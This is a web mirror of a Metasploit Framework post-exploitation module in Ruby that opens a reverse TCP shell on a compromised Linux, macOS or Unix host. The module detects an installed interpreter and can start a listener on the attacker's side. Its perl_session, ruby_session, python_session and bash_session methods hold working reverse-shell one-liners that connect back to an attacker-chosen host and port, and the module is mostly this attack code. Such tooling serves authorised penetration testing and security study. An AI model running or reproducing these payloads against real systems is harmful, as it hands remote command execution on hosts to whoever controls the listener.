CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/manage/system_session.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Multi Manage System Remote TCP Shell Session',

13
        'Description' => %q{

14
          This module will create a Reverse TCP Shell on the target system

15
          using the system's own scripting environments installed on the

16
          target.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],

20
        'Platform' => %w[linux osx unix],

21
        'SessionTypes' => [ 'meterpreter', 'shell' ]

22
      )

23
    )

24
    register_options(

25
      [

26
        OptAddressLocal.new('LHOST',

27
                            [true, 'IP of host that will receive the connection from the payload.']),

28
        OptInt.new('LPORT',

29
                   [false, 'Port for Payload to connect to.', 4433]),

30
        OptBool.new('HANDLER',

31
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),

32
        OptEnum.new('TYPE', [

33
          true, 'Scripting environment on target to use for reverse shell',

34
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']

35
        ])

36
      ]

37
    )

38
  end

39


40
  # Run Method for when run command is issued

41
  def run

42
    create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']

43
    lhost = datastore['LHOST']

44
    lport = datastore['LPORT']

45
    cmd = ''

46


47
    begin

48
      case datastore['TYPE']

49
      when /auto/i

50
        cmd = auto_create_session(lhost, lport)

51
      when /ruby/i

52
        cmd = ruby_session(lhost, lport)

53
      when /python/i

54
        cmd = python_session(lhost, lport)

55
      when /perl/i

56
        cmd = perl_session(lhost, lport)

57
      when /bash/i

58
        cmd = bash_session(lhost, lport)

59
      end

60
    rescue StandardError

61
    end

62


63
    if !cmd.empty?

64
      print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")

65
      cmd_exec("(#{cmd} &)")

66
    end

67
  end

68


69
  # Runs a reverse tcp shell with the scripting environment found

70
  def auto_create_session(lhost, lport)

71
    cmd = ''

72


73
    if cmd_exec('perl -v') =~ /Larry/

74
      print_status('Perl was found on target')

75
      cmd = perl_session(lhost, lport)

76
      vprint_status("Running #{cmd}")

77


78
    elsif cmd_exec('ruby -v') =~ /revision/i

79
      print_status('Ruby was found on target')

80
      cmd = ruby_session(lhost, lport)

81
      vprint_status("Running #{cmd}")

82


83
    elsif cmd_exec('python -V') =~ /Python 2\.(\d)/

84
      print_status('Python was found on target')

85
      cmd = python_session(lhost, lport)

86
      vprint_status("Running #{cmd}")

87


88
    elsif cmd_exec('bash --version') =~ /GNU bash/

89
      print_status('Bash was found on target')

90
      cmd = bash_session(lhost, lport)

91
      vprint_status("Running #{cmd}")

92
    else

93
      print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')

94
    end

95


96
    return cmd

97
  end

98


99
  # Method for checking if a listner for a given IP and port is present

100
  # will return true if a conflict exists and false if none is found

101
  def check_for_listner(lhost, lport)

102
    conflict = false

103
    client.framework.jobs.each do |_k, j|

104
      next unless j.name =~ %r{ multi/handler}

105


106
      current_id = j.jid

107
      current_lhost = j.ctx[0].datastore['LHOST']

108
      current_lport = j.ctx[0].datastore['LPORT']

109
      if (lhost == current_lhost) && (lport == current_lport.to_i)

110
        print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")

111
        conflict = true

112
      end

113
    end

114
    return conflict

115
  end

116


117
  # Starts a exploit/multi/handler session

118
  def create_multihand(lhost, lport)

119
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')

120
    pay.datastore['LHOST'] = lhost

121
    pay.datastore['LPORT'] = lport

122
    print_status('Starting exploit/multi/handler')

123
    if !check_for_listner(lhost, lport)

124
      # Set options for module

125
      mul = client.framework.exploits.create('multi/handler')

126
      mul.share_datastore(pay.datastore)

127
      mul.datastore['WORKSPACE'] = client.workspace

128
      mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'

129
      mul.datastore['EXITFUNC'] = 'thread'

130
      mul.datastore['ExitOnSession'] = false

131
      # Validate module options

132
      mul.options.validate(mul.datastore)

133
      # Execute showing output

134
      mul.exploit_simple(

135
        'Payload' => mul.datastore['PAYLOAD'],

136
        'LocalInput' => user_input,

137
        'LocalOutput' => user_output,

138
        'RunAsJob' => true

139
      )

140
    else

141
      print_error('Could not start handler!')

142
      print_error('A job is listening on the same Port')

143
    end

144
  end

145


146
  # Perl reverse TCP Shell

147
  def perl_session(lhost, lport)

148
    if cmd_exec('perl -v') =~ /Larry/

149
      print_status('Perl reverse shell selected')

150
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \

151
            "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

152
    else

153
      print_error('No scripting environment found for the selected type.')

154
      cmd = ''

155
    end

156
    return cmd

157
  end

158


159
  # Ruby reverse TCP Shell

160
  def ruby_session(lhost, lport)

161
    if cmd_exec('ruby -v') =~ /revision/i

162
      print_status('Ruby reverse shell selected')

163
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \

164
             "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"

165
    else

166
      print_error('No scripting environment found for the selected type.')

167
      cmd = ''

168
    end

169
    return cmd

170
  end

171


172
  # Python reverse TCP Shell

173
  def python_session(lhost, lport)

174
    if cmd_exec('python -V') =~ /Python 2\.(\d)/

175
      print_status('Python reverse shell selected')

176
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \

177
             "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \

178
             "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

179
    else

180
      print_error('No scripting environment found for the selected type.')

181
      cmd = ''

182
    end

183
    return cmd

184
  end

185


186
  # Bash reverse TCP Shell

187
  def bash_session(lhost, lport)

188
    if cmd_exec('bash --version') =~ /GNU bash/

189
      print_status('Bash reverse shell selected')

190
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"

191
    else

192
      print_error('No scripting environment found for the selected type.')

193
      cmd = ''

194
    end

195
    return cmd

196
  end

197
end

198


199